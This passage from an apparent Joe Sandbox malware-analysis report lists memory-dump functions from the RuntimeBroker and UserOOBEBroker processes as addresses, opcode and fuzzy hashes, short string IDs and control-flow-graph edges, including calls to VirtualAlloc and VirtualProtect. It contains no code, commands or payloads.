                                                                                                                            • Instruction Fuzzy Hash: 10E01274F0DA1E87F764A184C8A17E97265FF48301F160278D95E933E1CD38AE418655
                                                                                                                            Function 00007FFD9B793EF0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b790000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                            • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                            • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                            • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                            Function 00007FFD9B780D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction ID: 3b939d2fba89b4d7d448400fa20d0d502cb5f49ed896c787ba8d34c837fee806
                                                                                                                            • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction Fuzzy Hash: 8FE01234B0970ECBE710DF94C4D46ED7761FB51712F104365C401872F9DA786784C680
                                                                                                                            Function 00007FFD9B7982FE Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b790000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fedbadbff1519804d94e063eef599c97cb856fdf78c06dfa922d57f7475bb6e4
                                                                                                                            • Instruction ID: e5191042f11c0b1c59e6547ca15030bc6e331110a43b57d578f3f434fd6444a8
                                                                                                                            • Opcode Fuzzy Hash: fedbadbff1519804d94e063eef599c97cb856fdf78c06dfa922d57f7475bb6e4
                                                                                                                            • Instruction Fuzzy Hash: 22E0EC30E09A2ECAE7B09B54C8947AC72A1BB09300F9503F6C00DA31A5CB796E819B41
                                                                                                                            Function 00007FFD9B7944BD Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b790000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 59c559345ee7f8a60e1303bf97bf6afec6e692f9d493e5e82abc04fcce22de58
                                                                                                                            • Instruction ID: 61dfdaccf51ae527112af73ac2fabd4ff9faf736bafa2011dbee96018db44427
                                                                                                                            • Opcode Fuzzy Hash: 59c559345ee7f8a60e1303bf97bf6afec6e692f9d493e5e82abc04fcce22de58
                                                                                                                            • Instruction Fuzzy Hash: 06D09E70E2851ECEEB58EF94C875ABD76B1BF44304F400175E42A973DADF3829018740
                                                                                                                            Function 00007FFD9BB704EB Relevance: .0, Instructions: 11COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 88e55b84dec5f72966ee0f819f96e800e15a32b1d3cef185b8e7abc29e2bc711
                                                                                                                            • Instruction ID: 14521e156b6a8369a1c726f5a2733775958e5bd93e57febe60682ea1eac7887c
                                                                                                                            • Opcode Fuzzy Hash: 88e55b84dec5f72966ee0f819f96e800e15a32b1d3cef185b8e7abc29e2bc711
                                                                                                                            • Instruction Fuzzy Hash: 3DD09210B0F64F85FA784A9180F023E21A1EF40B08EA6013FC05F42CF1891DBA41AA12
                                                                                                                            Function 00007FFD9B784960 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7c061816c3d3ed762fc8e12dee4cd4c6f3d26f04d16654fda740b5f57d5d57d9
                                                                                                                            • Instruction ID: b4c023c517289005da95518a587d2ffef6885032480dbe9c4dc0a4b771887dbf
                                                                                                                            • Opcode Fuzzy Hash: 7c061816c3d3ed762fc8e12dee4cd4c6f3d26f04d16654fda740b5f57d5d57d9
                                                                                                                            • Instruction Fuzzy Hash: 66C08C00F1DD1A06F7596204447063E04026B84208F8103B0E41F833CECD1C1E0282CB

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B7906FA Relevance: 9.0, Strings: 7, Instructions: 222COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b790000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =L_^$L_^%$L_^($L_^*$L_^+$L_^2$L_^4
                                                                                                                            • API String ID: 0-372438357
                                                                                                                            • Opcode ID: 8f9e491a88cca417c5034b78ace8f4607692b331f97e72d80ad31f72766aabed
                                                                                                                            • Instruction ID: b0f2c0a47855f8241f55af9a9de6bf7a4eb909e0bbb3c83b1470cb62e36692e0
                                                                                                                            • Opcode Fuzzy Hash: 8f9e491a88cca417c5034b78ace8f4607692b331f97e72d80ad31f72766aabed
                                                                                                                            • Instruction Fuzzy Hash: 5551826BB8C5260DE31936A939668FD3705DF61338B0497B3F12E890DB8F1CA58249D9
                                                                                                                            Function 00007FFD9B79063D Relevance: 7.8, Strings: 6, Instructions: 297COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b790000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =L_^$L_^($L_^*$L_^+$L_^2$L_^4
                                                                                                                            • API String ID: 0-4204485965
                                                                                                                            • Opcode ID: 3075aed9febbcd76b062bffde9c22eef2e150b270658387f6dda6b00a4bebe32
                                                                                                                            • Instruction ID: c3f4a4fb63f24b779dbb6ccae9698018d5d9f2963558d413e81c73c3c0c7da1f
                                                                                                                            • Opcode Fuzzy Hash: 3075aed9febbcd76b062bffde9c22eef2e150b270658387f6dda6b00a4bebe32
                                                                                                                            • Instruction Fuzzy Hash: BB81471BB8C5260CE31877FD79628FD3701DFA1379B0486B3F26E890D78E1864824AD6
                                                                                                                            Function 00007FFD9B7906D3 Relevance: 5.2, Strings: 4, Instructions: 226COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b790000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: L_^*$L_^+$L_^2$L_^4
                                                                                                                            • API String ID: 0-2239636390
                                                                                                                            • Opcode ID: 64485f94932d1b78f1a200f6b3d16f343394b8addf07077007274c8859f9bdde
                                                                                                                            • Instruction ID: e88866af8e895ef86b132bdb1c2003c29facb74f6fd7e18b2f6219219d8ef4e9
                                                                                                                            • Opcode Fuzzy Hash: 64485f94932d1b78f1a200f6b3d16f343394b8addf07077007274c8859f9bdde
                                                                                                                            • Instruction Fuzzy Hash: CB51A12BB8C5260DE31977B839668FD3701CF61338B0496F7F16E890DB4E1CA5824AC9

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:8
                                                                                                                            Total number of Limit Nodes:1
                                                                                                                            execution_graph 20451 7ffd9b75c491 20452 7ffd9b75c49f VirtualAlloc 20451->20452 20454 7ffd9b75c547 20452->20454 20455 7ffd9b75b4ba 20457 7ffd9b75b4c9 20455->20457 20456 7ffd9b75b497 20457->20456 20458 7ffd9b75b575 VirtualProtect 20457->20458 20459 7ffd9b75b5ae 20458->20459

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B750D48 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 214 7ffd9b750d48-7ffd9b750d9b call 7ffd9b7507d0 217 7ffd9b750da0-7ffd9b750e5c 214->217 228 7ffd9b750e5e-7ffd9b750eb9 217->228 233 7ffd9b750ebb-7ffd9b750f05 228->233 237 7ffd9b750f1e 233->237 238 7ffd9b750f07 233->238 240 7ffd9b750f1f-7ffd9b750f63 237->240 239 7ffd9b750f08-7ffd9b750f1d 238->239 239->240 240->239 244 7ffd9b750f65-7ffd9b751050 240->244
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5\_H
                                                                                                                            • API String ID: 0-3325266018
                                                                                                                            • Opcode ID: 593e023e34ea3f595972ac83ac625c13210f0f4e52d33c47f5edc09dcf79d53b
                                                                                                                            • Instruction ID: 45ebf3b4913a2505e873dfe0ca2761f2d67df6951fe537e6ddfef7f7489ba170
                                                                                                                            • Opcode Fuzzy Hash: 593e023e34ea3f595972ac83ac625c13210f0f4e52d33c47f5edc09dcf79d53b
                                                                                                                            • Instruction Fuzzy Hash: 2D91D3B5A1DA8D4FE799DFAC8C697A97FE0FF56310F0401BAD04AC72E6DAB814118740
                                                                                                                            Function 00007FFD9B761752 Relevance: 2.2, Strings: 1, Instructions: 949COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 7ffd9b761752 1 7ffd9b761757-7ffd9b76177d 0->1 4 7ffd9b7618d1-7ffd9b7618fb 1->4 5 7ffd9b761783-7ffd9b7617ae 1->5 10 7ffd9b7618fd-7ffd9b76191a 4->10 11 7ffd9b761947-7ffd9b76194a 4->11 15 7ffd9b7617bd-7ffd9b761845 5->15 16 7ffd9b7617b0-7ffd9b7617ba 5->16 17 7ffd9b761920-7ffd9b761945 10->17 18 7ffd9b761a8b-7ffd9b761a93 10->18 14 7ffd9b761951-7ffd9b761986 11->14 36 7ffd9b761a2c-7ffd9b761a42 14->36 37 7ffd9b76198c-7ffd9b7619df 14->37 51 7ffd9b76188c-7ffd9b76188f 15->51 52 7ffd9b761847-7ffd9b76188a 15->52 16->15 17->11 25 7ffd9b761a94-7ffd9b761a99 18->25 27 7ffd9b761a9b-7ffd9b761aaf 25->27 28 7ffd9b761a47-7ffd9b761a62 25->28 31 7ffd9b761c4d-7ffd9b761c4e 27->31 44 7ffd9b761a69-7ffd9b761a84 28->44 34 7ffd9b761c55-7ffd9b761c61 31->34 35 7ffd9b761c50 call 7ffd9b762918 31->35 35->34 36->31 37->44 59 7ffd9b7619e5-7ffd9b7619f0 37->59 44->18 53 7ffd9b761891-7ffd9b7618a2 51->53 54 7ffd9b7618a4-7ffd9b7618a5 51->54 58 7ffd9b7618b1-7ffd9b7618cb 52->58 53->58 54->58 58->4 58->5 61 7ffd9b760f9d-7ffd9b760fdc 59->61 62 7ffd9b7619f6-7ffd9b761a00 59->62 73 7ffd9b760fde-7ffd9b761149 61->73 62->25 64 7ffd9b761a06-7ffd9b761a26 62->64 64->36 64->37 98 7ffd9b76114b-7ffd9b761154 73->98 99 7ffd9b761178-7ffd9b7611b9 73->99 100 7ffd9b76115a-7ffd9b76116a 98->100 101 7ffd9b761699-7ffd9b7616cf 98->101 111 7ffd9b7611ce-7ffd9b761243 99->111 112 7ffd9b7611bb-7ffd9b7611cd 99->112 105 7ffd9b761170-7ffd9b761174 100->105 113 7ffd9b7616d1-7ffd9b761710 101->113 114 7ffd9b761748-7ffd9b761751 101->114 105->99 129 7ffd9b761274-7ffd9b7612c3 111->129 130 7ffd9b761245-7ffd9b76126e 111->130 112->111 123 7ffd9b761712-7ffd9b761715 113->123 124 7ffd9b76172a-7ffd9b761746 113->124 114->0 123->124 125 7ffd9b761717-7ffd9b761727 123->125 124->113 124->114 125->124 138 7ffd9b7612cf-7ffd9b761307 129->138 139 7ffd9b7612c5-7ffd9b7612ca 129->139 130->129 144 7ffd9b761313-7ffd9b76134b 138->144 145 7ffd9b761309-7ffd9b76130e 138->145 140 7ffd9b761683-7ffd9b761693 139->140 140->101 140->105 149 7ffd9b76134d-7ffd9b761352 144->149 150 7ffd9b761357-7ffd9b76138f 144->150 145->140 149->140 154 7ffd9b761391-7ffd9b761396 150->154 155 7ffd9b76139b-7ffd9b7613d3 150->155 154->140 159 7ffd9b7613df-7ffd9b761417 155->159 160 7ffd9b7613d5-7ffd9b7613da 155->160 164 7ffd9b761423-7ffd9b76145b 159->164 165 7ffd9b761419-7ffd9b76141e 159->165 160->140 169 7ffd9b76145d-7ffd9b761462 164->169 170 7ffd9b761467-7ffd9b76149f 164->170 165->140 169->140 174 7ffd9b7614a1-7ffd9b7614a6 170->174 175 7ffd9b7614ab-7ffd9b7614e3 170->175 174->140 179 7ffd9b7614ef-7ffd9b761527 175->179 180 7ffd9b7614e5-7ffd9b7614ea 175->180 184 7ffd9b761533-7ffd9b76156b 179->184 185 7ffd9b761529-7ffd9b76152e 179->185 180->140 189 7ffd9b76156d-7ffd9b761572 184->189 190 7ffd9b761577-7ffd9b7615af 184->190 185->140 189->140 194 7ffd9b7615b1-7ffd9b7615b6 190->194 195 7ffd9b7615bb-7ffd9b7615c4 190->195 194->140 195->140
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: O_H
                                                                                                                            • API String ID: 0-1880849852
                                                                                                                            • Opcode ID: 49d679fba961e14f9c3c364c4d7d093cc7028547dd3d3984be08aea6df6ed751
                                                                                                                            • Instruction ID: 9f088a71e0630f7a944c36865ea01cd2e9ac1f5c71a90a5710020beea2c6488e
                                                                                                                            • Opcode Fuzzy Hash: 49d679fba961e14f9c3c364c4d7d093cc7028547dd3d3984be08aea6df6ed751
                                                                                                                            • Instruction Fuzzy Hash: 1962A621B19A0E8FE7A8EB6C88A567877D2FF94340F1506B9D40EC36F7DD24AD428741
                                                                                                                            Function 00007FFD9B75B4BA Relevance: 1.7, APIs: 1, Instructions: 162memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 197 7ffd9b75b4ba-7ffd9b75b4c7 198 7ffd9b75b4d2-7ffd9b75b4e3 197->198 199 7ffd9b75b4c9-7ffd9b75b4d1 197->199 200 7ffd9b75b4ee-7ffd9b75b4fa 198->200 201 7ffd9b75b4e5-7ffd9b75b4ed 198->201 199->198 202 7ffd9b75b4fc-7ffd9b75b5ac VirtualProtect 200->202 203 7ffd9b75b497 200->203 201->200 210 7ffd9b75b5b4-7ffd9b75b5dc 202->210 211 7ffd9b75b5ae 202->211 204 7ffd9b75b499-7ffd9b75b49a 203->204 205 7ffd9b75b4a5-7ffd9b75b4b6 203->205 204->205 211->210
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B757000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B757000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b757000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 0709c2b087d8547f459d53948b7ac21cb5f635ced6107aa4c2e8bb635d9fdc69
                                                                                                                            • Instruction ID: 3a79781adebb2979ea69c8adbea0bf48d2ecdf9cf1627bc14c598cd7de0e6160
                                                                                                                            • Opcode Fuzzy Hash: 0709c2b087d8547f459d53948b7ac21cb5f635ced6107aa4c2e8bb635d9fdc69
                                                                                                                            • Instruction Fuzzy Hash: 56411D31A0D78D4FD7299BA89C166F97BE0EF56321F0442AFD089C32A3DA7564068792
                                                                                                                            Function 00007FFD9B75C491 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 255 7ffd9b75c491-7ffd9b75c49d 256 7ffd9b75c4a1-7ffd9b75c4dd 255->256 257 7ffd9b75c49f 255->257 258 7ffd9b75c4e1-7ffd9b75c546 VirtualAlloc 256->258 257->256 257->258 261 7ffd9b75c547-7ffd9b75c552 258->261 262 7ffd9b75c554 261->262 263 7ffd9b75c55a-7ffd9b75c582 261->263 262->263
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B757000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B757000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b757000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: fba2ce66cde013f0d42e8c63ed9801e8c404fddf514d0864e8ece027867b0ba3
                                                                                                                            • Instruction ID: 044ffb68b037bb069ff7ad4e00c6b43025b81bf996d05ed2249c1fd4d689a4eb
                                                                                                                            • Opcode Fuzzy Hash: fba2ce66cde013f0d42e8c63ed9801e8c404fddf514d0864e8ece027867b0ba3
                                                                                                                            • Instruction Fuzzy Hash: D2310C31A0CB4C5FDB1DABA898166F97BF0EF56321F04426FE04AC3553DA646816C7D1
                                                                                                                            Function 00007FFD9B781A49 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 281 7ffd9b781a49-7ffd9b781a7a 282 7ffd9b781a7e-7ffd9b781a83 281->282
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: H
                                                                                                                            • API String ID: 0-2852464175
                                                                                                                            • Opcode ID: b550958b2c23272b5f4ba2af651282fe4a4256ec27859a32dccf222197b57efc
                                                                                                                            • Instruction ID: 836543b6ba14a2e6e4b838e3828d27d3c7859bf891f75d33e7ede7017829bc49
                                                                                                                            • Opcode Fuzzy Hash: b550958b2c23272b5f4ba2af651282fe4a4256ec27859a32dccf222197b57efc
                                                                                                                            • Instruction Fuzzy Hash: 33E02031F557844FCB0D9A2C88644607BB1EF67215B8552FBC046CB193ED1CDC86C741
                                                                                                                            Function 00007FFD9B78A529 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 283 7ffd9b78a529-7ffd9b78a53d 284 7ffd9b78a53f-7ffd9b78a55a 283->284 285 7ffd9b78a55e-7ffd9b78a563 284->285
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 0b939677575ab9284909298ed49471f4727b442425943699eafb035662cc1cb5
                                                                                                                            • Instruction ID: 4307a4f8489ad8127fe18d0f67261a95ab1e6716a412ce43c632ce8170589bea
                                                                                                                            • Opcode Fuzzy Hash: 0b939677575ab9284909298ed49471f4727b442425943699eafb035662cc1cb5
                                                                                                                            • Instruction Fuzzy Hash: E5E0656160E7C44FC716D6344869454BFA0EF6721174A42EEC045CF1A3EA2D8885CB01
                                                                                                                            Function 00007FFD9B781AD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 289 7ffd9b781ad9-7ffd9b781aed 290 7ffd9b781aef-7ffd9b781b04 289->290 291 7ffd9b781b08-7ffd9b781b0d 290->291
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: e739f5ca0f27adfe10c54e11ecfd285b3a4808e413f42d077edd9cfd52d20fc3
                                                                                                                            • Instruction ID: 72599f7c9563e886584fba688920104c43d848c5839ac884eb5021e6365c4d46
                                                                                                                            • Opcode Fuzzy Hash: e739f5ca0f27adfe10c54e11ecfd285b3a4808e413f42d077edd9cfd52d20fc3
                                                                                                                            • Instruction Fuzzy Hash: 3FE01A6154F7C44FCB16EB7488A98457FA0EE6B21178B41EEC089CF1B3E62D8849CB01
                                                                                                                            Function 00007FFD9B787E19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 292 7ffd9b787e19-7ffd9b787e44 294 7ffd9b787e48-7ffd9b787e4d 292->294
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 811cbad05ce20ed3468c8e9c76a646146cc93f0c5c1653d3095583cc9a18c11f
                                                                                                                            • Instruction ID: e8869aa9dc1c55c6dabfe5a37466dbaf7692662a000ce4d853f505cb17f9a3d9
                                                                                                                            • Opcode Fuzzy Hash: 811cbad05ce20ed3468c8e9c76a646146cc93f0c5c1653d3095583cc9a18c11f
                                                                                                                            • Instruction Fuzzy Hash: 76E01A6154F7C44FCB16EB7488A98447FA1AE6721178B41EEC186CF1B3E62D8849C701
                                                                                                                            Function 00007FFD9B7793E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 286 7ffd9b7793e9-7ffd9b779414 288 7ffd9b779418-7ffd9b77941d 286->288
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 18eecda80c365914984ad969bd45b1530cc817046941bad647aee8443c615ad2
                                                                                                                            • Instruction ID: 0dee9b1b6f8a53ff91157cb483bc4ee3b148d10756932081db076d98a5dceee8
                                                                                                                            • Opcode Fuzzy Hash: 18eecda80c365914984ad969bd45b1530cc817046941bad647aee8443c615ad2
                                                                                                                            • Instruction Fuzzy Hash: 7AE0E56154E7C48FCB56EA7488AA8547FA0EE6721078A41EEC089CB1B3E6299849C701
                                                                                                                            Function 00007FFD9B7795D1 Relevance: .3, Instructions: 312COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 77e317702edd0e2227e7a019456e6d717b5b73b5e13577f3ccf090fa7d264587
                                                                                                                            • Instruction ID: 5452856ee6190c31bb93a0452d6c229542ce0779ee4bd272f4a71c2d3b7d565b
                                                                                                                            • Opcode Fuzzy Hash: 77e317702edd0e2227e7a019456e6d717b5b73b5e13577f3ccf090fa7d264587
                                                                                                                            • Instruction Fuzzy Hash: 26A18230B1994D5FDB58EF68C8A5AB977E1FF58304B5106B9E01EC32A6DE34A842C741
                                                                                                                            Function 00007FFD9B78317D Relevance: .3, Instructions: 287COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
